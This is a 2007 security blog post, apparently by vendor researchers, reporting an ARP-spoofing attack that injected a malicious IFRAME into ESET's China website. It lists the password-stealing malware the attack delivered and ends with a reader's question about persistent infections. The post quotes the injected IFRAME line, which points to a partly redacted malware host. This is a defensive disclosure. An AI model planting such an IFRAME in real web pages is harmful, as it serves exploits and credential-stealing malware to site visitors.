Nod to more ARP mayhem ?
Thursday October 11, 2007 at 7:35 am CST
Posted by Haowei Ren, Geok Meng Ong
Following our blog about the significance of web hosting security vs ARP spoofing, our friends from security vendor ESET made an official statement on October 9th, about an ARP attack against their official China website earlier this week. Identical to other ARP attacks, their web pages were found inserted with the following malicious IFRAME link:
<iframe src=http://fs18.net/down{blocked}/yy.htm width=20 height=0 frameborder=0></iframe>
The “yy.htm” web page, detected generically as Exploit-MS06-014 , can download a variety of malware including:
- vip1.htm (Exploit-BaoFeng.a)
- 0.exe (PWS-QQGame)
- kvmxeis.exe (PWS-OnlineGames.a)
- ii.exe (PWS-QQPass.dll)
- SysWin78.Jmp (PWS-QQGame)
- WinSys88.Sys (PWS-QQGame)
- System6.ins (PWS-QQPass.dll)
In 2007, hijacking of popular websites has become one of the many effective malware propagation methods in China. From W32/Fujacks -style web page infection to ARP spoofing, we have seen many important websites reportedly hijacked to host exploits and malware since the end of 2006.
With relatively good success, this means of malware infection and exploitation has also rapidly evolved from common Microsoft vulnerabilities - Exploit-MS06-014, Exploit-MS07-004, etc. to application-level vulnerabilities such as Yahoo Messenger, a Chinese media player called Baofeng and PPStream.
Network intrusion prevention security, web server policies and patch management comes to mind as needed minimum defenses and should to be reviewed by companies both using or offering web services as well as ISPs.
January 16th, 2008 at 9:45 am
Hello,
I keep removing the PWS-OnlineGames.a and PWS-Mmorpg.gen and they keep reappearing. McAfee detects and deletes the files but it keeps coming back. I even ran the scan command from safe mode with all the options that McAfee recommends and I still have the virus. What do you recommend I do now to get rid of this nuisance.
Thanks.
Syed